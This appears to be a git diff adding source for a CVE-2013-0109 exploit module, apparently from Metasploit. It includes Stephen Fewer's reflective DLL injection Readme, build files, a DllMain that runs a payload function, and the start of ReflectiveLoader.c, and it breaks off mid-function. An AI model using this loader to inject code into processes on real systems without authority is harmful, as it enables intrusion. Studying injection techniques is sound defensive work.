zOOR=)S>A>5R_P}h86{qr-KVBnDcZW!zZ5?ZVa*2otbmZ>C94&V75^wG-7R^fdD2|G z=SVK;HtA+55575+UCLj%Hot1c3UZ5A$i8JO72%&b#6NxI%GLJ~?2Oe_o(&Jk-m2C2 ztysHOk{*=SO7}^tr7CF!{@pAs7wsZQTuVh4K;MEorxj`DgDOTXz6HxCrK56^?ry?9rNw7H2v29Q5#je-)tVHyt^vqzBLogyS;!?-O@N@{xWoLW+os z=36E>k)SBXz*hp75RQ^$;Drms0v{@yaER7zxT_-dP=2HCXuaSoQ76GsJygyzV6ULI z^#Fe0&vEGh@jDyeYU!xGAXTSa-L*~?Z*#mi)+YB>_9 zys8I;Z@yotS{sQgS+RW8ib!C-V)zPIuM(-nO2l0zQ(g)AB*066lK>+jU5cxz*-}$m zg9*&MrDn_j)!wzhM^T;o34~ifw9!Tz1j|5CLrcQU>|=K4nUDmD1Xz+F52LVTCuC(` z?ruWj0|J6lixw5Fk0^+!Sfj=k6)kOpr4?FGhv8nuS zd#^V$zi-dXd3>+)ecw4VXJ%(*OYV>%h+wN%uO7lM9M|G&p+BL_KilJ*(}MVfAm;O} z0V`~N%bFInVi3ma>+6RO{Yq0Twlo&Yh+ky65%gdX-ekZN$)Dort2mBnJCPY~rqzgP zGtqlh8Fj4EDyAH^eaDX<&guIe*GaRC)!=zRKJjLM1@>B9x77)cR zc`5NY9bA-yAJ&YJ0W+`8=w0w}LF%gJkqCJSoh&n!wJ_-zL7M3u^7*a@T6B53+V zAxg?kDJ`sF!rrkXa|n)FF@X(YR+zMscBAPX(r)!k|s@ zi+rAC@|j7<4FTH(oYete1m`3(Nl7_m1*A`ssJEsfCXZx2R*WV2EUW2mS!(h`(USNo z?6M`hzlE;;j-V|`Y@i-#YcXVHK_P~=6zPc{3wsEuB`xI=UaKUGnl|^gZP|4AE;`4y zE5ef5--O%NcM0sX8t2q6qGa%RfF5}g`REs+=jx&t zgH2j}-w0fB;H2?B1g-V<9NQPWHD=kNz&N|`^!1GPrMW82gKdn7 zE^h69=WumHbZC68L%&2#-B8q^u`Y&lI;JR2qZ5sEmS$-5u%f%whODbw7i3p-P1kV; z{&)&$JyN=s$U#aok6pJjIdm}?LwYjhBRz%kTbZ1%Q9jZa_|-dQ-pLB z(!IAbIir!bAjMliOc7GNbjLK^!sM_>bC8Zj%6=bfi%37YiOHdfTqn{?knTiE4|i=x zid)r8E7IwvZ_xNiK2vAPd>-;hZYwI3FyF?`!ehv?$%3ufRRxadYQerTV4zQHepQGu zq!9QO=#4NhHfz!NOOe`YO}Lhr+FXiX4YjFnGAWdyoi%?OYvT50V3UAvU}K?$%sn6e zYwel&$3B~iI|-k+uVQ-dne|sN-8+36t3P`>hLueBJ_!EPpWSXhU;#{z-ltx!|94wJ z){3q@tDl?QgOsk!>fQ%s^>4S^lf1{b|1%FDO1ao=igea}oP)nJ`d7A|_4_AncdZHIs*Ij?Z`WtWh{>``CdRy!5cWl^r=cc7O&`m>H5PyT%8FMj#duBUfDv*+38 zp5Obzi!bf_)yu!$|H^?^5B}!0-**1)(C-hw{)ayv`O_PJe)BJHy?ykr@BHoE_ul{e z2Ooa)@h6{t_75g&(BSML|Miuj!-k(Q;>44_nsf3gU&}r9w6EulJbl#YGrlo~9Xsxu z%Vw%Nom=XbEcM`JFQ~+jG4Y!l~vXFE1tRY z=3DyjyZnEJ{&6EZb-#H|FcOF^txEcnLELjf{_KPipSkEFqc&L{sf)(LX2Bfz49Y6} ziDYqYGT3PNqOpdUnP;6_Xqf4^gY92zOpZ3qVP@lA4c#H{d2gKj?|99>Z}s-e{FxHm zo06!?YnS;{Q%*vi$}vL{{2ZdWT3MrvXLko@F)E&bU}o{{;*+{ zXh0J6CfbDp1SU5GLndCMDHe(blWbvOp~bf;WYS-|gsqK6mjn%#JF7{eBH*U7NMmE7 zv9{1?GT24_L|QRc7mj1=U~)R~!3SEisH`fjdMLVJ9IFqB9& z=SCMLYHAye0)gWl1suBUQXJux2&-Q`yGRxET z@#hP`7l8P%b(dcLj|H%ug_-3&_4KAcv%Dw$jac(c$KSJj$>PlNo_bcIpI?4zEVI0) zetzAYS>6->j#ZiEJ^3582G_(7k_6V~Ye%}yKFdr8*1j!$tYJ#b0b)upWE3-J4xy-R z&wUM z&U`6*cBI}U94Kq5#S$AvL~uz+nY**Gu-$j@;POPNv8ZA3Vk7R08woJTyv39eKP5Dh z)%rtKm|@VAgYgcoF#L^1ulzSqKV6PrWLJk0sa5l*=orFVE9<-HtZSY9mvm;XzP~-F zoG4>3DiH&=5-L71Nsp$wTuSbG*e%9_ekNP`hmzwIu}=2Lccb ztC-IZnrirCCP8LoR{BzYlyF)-R}yU?$^mL!l?j z@Nd*RWFXbeG2Cypu=wN2h8RuK<}fdy&qGGCCl2Oo-I7x48JMCJGmJlrxGjq`2IJ8P zsiZ0y#{?iThdFu3oM6Bx!7QRWI=vy33{GxN8q5Kreyr-uv!?8peKX8+=2@wcNXDbh z%)NtWH5l<`pAk2wk&#-%lm*6f194RytX-1Q%8uT)2SaW)rEE@MVYfO6z7wYWIAY>v zeIJRAKfDL7;u0Ujh*W=O*>pM{4*P>`1Op}H2$+#FdD)f8(Co-kOm~@QOg=4BdeJ3%krfdp+o73kNSE@_XnYDLpAB(1 zvgKv_OnItcPk4gJiZvw`r*oLA2veH%eJ?FCflz9*pSL-*74vlD*{~ny2LYXcqqx!f z7E*?>=R_2c7E~H_A#&?RgVbomi?|fd|E~#skLux(KP&CTf9;VDD7EfDq%>mYW@?A- ziIdLz+NhjhU>ndte>KpAXI|?8WLNm_3)6nchUi*|QhJVz)>80T308W{=jP1ky6{At z`CJ#R&x`=j`V6IXu|{R|ESgZ)U~ykSGdUh zf?HOqot@ff>~lNqE5EPuf3?1i$4>3`U*0sQ&&`sV?Q{Eb=%nwP$(DS5-;Min$WK!A zX#%McyiXHgzdSmCB>%@vfxb?ZH7I-NW(<4_S2nL4o9di@j8p&a(lZtOs9!HvxwM2LXEk+W~EWn*pl;Nx(wDT!0TS z6;K55060KCfCc0MasWdC4B+SuzzNt3*a@Ke+mN;aS^;YSO@IKv2bc;d0!##C1CHWv z#HllEzI%1dac0mrtkO{&?>X_=lUMp*9-GFxJE5a{px1lx&OK<;_l~}WcQ*P1goB=I zAz*-$#XH{r43?+1Y}6l*`h5ZMNW5KtS2wRjh8=PPJqpyd(cCP3TaWtW3nVk~)l+s~ z@w|$e#ideun}Op24Gd^tKm!9B7|_6g1_m_nMKnP7*J!pu_t*d}bVi$a43>c$2G(wQlhrr2>TNS;b3h%nuyjV3u>cb z$)5-pHuB?GEdK@TurzZX79+6krjFwaxpCTw!&z2I#__@&t)}!7o5N~{mI4jKzT%A9ZFve-hq%Pc3s`qX^IzT(o-@)_sM zotrv1o^zU=wxa(=a?`jt_kHeR?#EmQx0`#O+sD1ay~Z8p{=yC7NARcd0$;*c@-=)N zzmmU!e}I36e_D86*e4tkMmQ!poR0Yp!|`3m9ga4~%Z?+CPaV0=vz(mM?Nps}oUP9L zolD(Ux^ME_?a7yBNl|H;v{qUtt(R_=TBXONXQXzmLo@W4e!2dL{)E0$|3C**EW^+e zP7asHjpgQZ*K+H*Te*k0-*KOEr}Fjujr?F?nDABMRAH1bR>&7732s3ZN`+}cr7&Mu zBwQpk3d@C6!qvih;dWt*uvK_mcv^T4JRcB_3V#U!F>&vm1_K%6FCEWRLiiXV&RvR7H9 zKBfLm&DGx3$w_?hgHwf(!WrP|OksjhAn<}F_yi7=&H;tBj$0fX90wgAI7T@Ooqp#s z=Zj9ly~p)Om*%c=&v)0kL+&Q`GWS*PYuq=vH@UaC+ue`4pLFkX|H}Pa_v`Mr-6xA@ zi522n@p^H)_@uZ?d`)~`9PPQu^SI~do{v3)y)(TFyoUE;?^5qo-fO%!csF_5y-#>M zyf1rS_5R-bC+|`3``%BzgQXLsQ>3p;W2Ah^DS0JLDwU>6Go&hMo^+uUmadS#BV8xm zB;6t1CEYKzqo;m}zIs7AAblh;a-Liwm&@nNtL1CuTjdwz1M(l_F-pGTRD8;L$^xZM zS)+Wa3{mscZ>ssKq?W4Xs-Z^J)#^I+2kIm0Pt<4Cm(;`R8QR&}bgf#8Xbsv%ZH!)~ zPtzM<1v~VYb*2bwda!{rxU;!R?jmjt*Tx;>-r`2{I$y@m=P%(m@IT-m=l{xo%qzk< z!YuTASSWC6&MD3c=PcOX&z(;@Uw5A9n&&cHNmsM$R@VmCQ?8d>2VI9;M_hh!m3WuuBTqC#3d*u)1(aIyrJIXM%S-V=>slA}Rs{KiONBczMbQzLesMqV4 z>KjNhdU>2#i{u3E8?f#Bxp%o*_}1TH)u+LlOJK)Uu;D9&4Y1t@g~x>L!ZX4)$aR9d)SVPB6%Rs&BjSzTA9-`oFW1SfO1&CZm#ep{537%< zh1vyLtrpkb*51?pp@sE?zFdD)e@;K7GYj#hUGOrJ8^ev~1Wx1>u9%y}wQyI0w_kAw zxLkfD&+=#T6L}uG-^ky`Kg5f|6k#?rUN2k&A8SPr6N=b*^xJ5B;$h{c)Ph;acu`z%@j?QhZ%pi-ls5SSbd?tHoCFL9s)8 zQ9KNf80tCQGtr}Ye4a&~N8uRToSb%hmF<(b`Jw8gTfKwpH7vZP$LI zeMR@`MS7_|Rj<%}dbK`RuhH+(+w^vQtG-RAQS~zLKAbDyJeo z?pNF&x+_Hd|EhSO__8?IbCO5#oa?#PyWV??cLV(XN*P4g(fiJLUVzWzN24Dn@*KaA z5AfsliMmr)z;gxotA z$|_}}(x&WEjwnObTy)iZ zhq4n=?@{(D`;`64L8VhU3?00w997;`K7cMps5#I_o;q4()$xdb6IG9@s6~i^Q`HJ+ hsal<@)~E}iD|E}iHlTq44Gd^tKm!9B__u1{zX9`va5ew{ literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2013-0109/LICENSE.txt b/external/source/exploits/cve-2013-0109/LICENSE.txt new file mode 100644 index 0000000000..f217025f51 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/LICENSE.txt @@ -0,0 +1,25 @@ +Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, are permitted +provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this list of +conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright notice, this list of +conditions and the following disclaimer in the documentation and/or other materials provided +with the distribution. + + * Neither the name of Harmony Security nor the names of its contributors may be used to +endorse or promote products derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/Readme.md b/external/source/exploits/cve-2013-0109/Readme.md new file mode 100644 index 0000000000..814e6e7517 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/Readme.md @@ -0,0 +1,40 @@ +About +===== + +Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host. + +Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable. + +Overview +======== + +The process of remotely injecting a library into a process is two fold. Firstly, the library you wish to inject must be written into the address space of the target process (Herein referred to as the host process). Secondly the library must be loaded into that host process in such a way that the library's run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory. + +Assuming we have code execution in the host process and the library we wish to inject has been written into an arbitrary location of memory in the host process, Reflective DLL Injection works as follows. + +* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table. +* As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on. +* The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc. +* The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on. +* The library's headers and sections are loaded into their new locations in memory. +* The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses. +* The ReflectiveLoader will then process the newly loaded copy of its image's relocation table. +* The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory. +* Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate. + +Build +===== + +Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release mode to make inject.exe and reflective_dll.dll + +Usage +===== + +To test use the inject.exe to inject reflective_dll.dll into a host process via a process id, e.g.: + +> inject.exe 1234 + +License +======= + +Licensed under a 3 clause BSD license, please see LICENSE.txt for details. diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln b/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln new file mode 100644 index 0000000000..eff992d77c --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 10.00 +# Visual C++ Express 2008 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj new file mode 100644 index 0000000000..33c6bd9515 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj @@ -0,0 +1,357 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj new file mode 100644 index 0000000000..b233a13c97 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj @@ -0,0 +1,266 @@ + + + + + Debug + ARM + + + Debug + Win32 + + + Debug + x64 + + + Release + ARM + + + Release + Win32 + + + Release + x64 + + + + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} + reflective_dll + Win32Proj + + + + DynamicLibrary + v100 + MultiByte + true + + + DynamicLibrary + v110 + MultiByte + true + + + DynamicLibrary + v110 + Unicode + + + DynamicLibrary + v110 + Unicode + + + DynamicLibrary + v110 + MultiByte + false + + + DynamicLibrary + v110 + Unicode + + + + + + + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>11.0.50727.1 + + + $(SolutionDir)$(Configuration)\ + $(Configuration)\ + true + + + true + + + $(SolutionDir)$(Platform)\$(Configuration)\ + $(Platform)\$(Configuration)\ + true + + + $(SolutionDir)$(Configuration)\ + $(Configuration)\ + false + exploit + + + false + + + $(SolutionDir)$(Platform)\$(Configuration)\ + $(Platform)\$(Configuration)\ + false + + + + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) + true + EnableFastChecks + MultiThreadedDebugDLL + + Level3 + EditAndContinue + + + true + Windows + MachineX86 + + + + + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) + true + EnableFastChecks + MultiThreadedDebugDLL + + + Level3 + EditAndContinue + + + true + Windows + + + + + X64 + + + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) + true + EnableFastChecks + MultiThreadedDebugDLL + + Level3 + ProgramDatabase + + + true + Windows + MachineX64 + + + + + MaxSpeed + OnlyExplicitInline + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + MultiThreaded + true + + Level3 + ProgramDatabase + + + true + Windows + true + true + MachineX86 + + + + + + + + + MinSpace + OnlyExplicitInline + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + MultiThreaded + true + + + Level3 + ProgramDatabase + true + Default + + + true + Windows + true + true + $(OutDir)$(ProjectName).arm.dll + + + copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\ + + + + + X64 + + + MaxSpeed + OnlyExplicitInline + true + Size + false + WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + MultiThreaded + true + + Level3 + ProgramDatabase + CompileAsCpp + + + $(OutDir)$(ProjectName).x64.dll + true + Windows + true + true + MachineX64 + + + copy $(OutDir)$(ProjectName).x64.dll ..\bin\ + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters new file mode 100644 index 0000000000..9bb86dca22 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + + + Source Files + + + Source Files + + + Source Files + + + + + Header Files + + + Header Files + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user new file mode 100644 index 0000000000..695b5c78b9 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h new file mode 100644 index 0000000000..5738497f5b --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h @@ -0,0 +1,51 @@ +//===============================================================================================// +// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H +#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H +//===============================================================================================// +#define WIN32_LEAN_AND_MEAN +#include + +// we declare some common stuff in here... + +#define DLL_QUERY_HMODULE 6 + +#define DEREF( name )*(UINT_PTR *)(name) +#define DEREF_64( name )*(DWORD64 *)(name) +#define DEREF_32( name )*(DWORD *)(name) +#define DEREF_16( name )*(WORD *)(name) +#define DEREF_8( name )*(BYTE *)(name) + +typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); +typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); + +#define DLLEXPORT __declspec( dllexport ) + +//===============================================================================================// +#endif +//===============================================================================================// diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c new file mode 100644 index 0000000000..d70da51fd1 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c @@ -0,0 +1,32 @@ +//===============================================================================================// +// This is a stub for the actuall functionality of the DLL. +//===============================================================================================// +#include "ReflectiveLoader.h" + +// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are +// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own +// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. + +// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) +extern HINSTANCE hAppInstance; +//===============================================================================================// +BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) +{ + BOOL bReturnValue = TRUE; + switch( dwReason ) + { + case DLL_QUERY_HMODULE: + if( lpReserved != NULL ) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + run(); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c new file mode 100644 index 0000000000..594c0b8066 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c @@ -0,0 +1,496 @@ +//===============================================================================================// +// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#include "ReflectiveLoader.h" +//===============================================================================================// +// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value +HINSTANCE hAppInstance = NULL; +//===============================================================================================// +#pragma intrinsic( _ReturnAddress ) +// This function can not be inlined by the compiler or we will not get the address we expect. Ideally +// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of +// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics +// available (and no inline asm available under x64). +__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); } +//===============================================================================================// + +// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, +// otherwise the DllMain at the end of this file will be used. + +// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, +// otherwise it is assumed you are calling the ReflectiveLoader via a stub. + +// This is our position independent reflective DLL loader/injector +#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) +#else +DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) +#endif +{ + // the functions we need + LOADLIBRARYA pLoadLibraryA = NULL; + GETPROCADDRESS pGetProcAddress = NULL; + VIRTUALALLOC pVirtualAlloc = NULL; + NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; + + USHORT usCounter; + + // the initial location of this image in memory + ULONG_PTR uiLibraryAddress; + // the kernels base address and later this images newly loaded base address + ULONG_PTR uiBaseAddress; + + // variables for processing the kernels export table + ULONG_PTR uiAddressArray; + ULONG_PTR uiNameArray; + ULONG_PTR uiExportDir; + ULONG_PTR uiNameOrdinals; + DWORD dwHashValue; + + // variables for loading this image + ULONG_PTR uiHeaderValue; + ULONG_PTR uiValueA; + ULONG_PTR uiValueB; + ULONG_PTR uiValueC; + ULONG_PTR uiValueD; + ULONG_PTR uiValueE; + + // STEP 0: calculate our images current base address + + // we will start searching backwards from our callers return address. + uiLibraryAddress = caller(); + + // loop through memory backwards searching for our images base address + // we dont need SEH style search as we shouldnt generate any access violations with this + while( TRUE ) + { + if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) + { + uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), + // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. + if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) + { + uiHeaderValue += uiLibraryAddress; + // break if we have found a valid MZ/PE header + if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) + break; + } + } + uiLibraryAddress--; + } + + // STEP 1: process the kernels exports for the functions our loader needs... + + // get the Process Enviroment Block +#ifdef WIN_X64 + uiBaseAddress = __readgsqword( 0x60 ); +#else +#ifdef WIN_X86 + uiBaseAddress = __readfsdword( 0x30 ); +#else WIN_ARM + uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); +#endif +#endif + + // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx + uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; + + // get the first entry of the InMemoryOrder module list + uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; + while( uiValueA ) + { + // get pointer to current modules name (unicode string) + uiValueB = 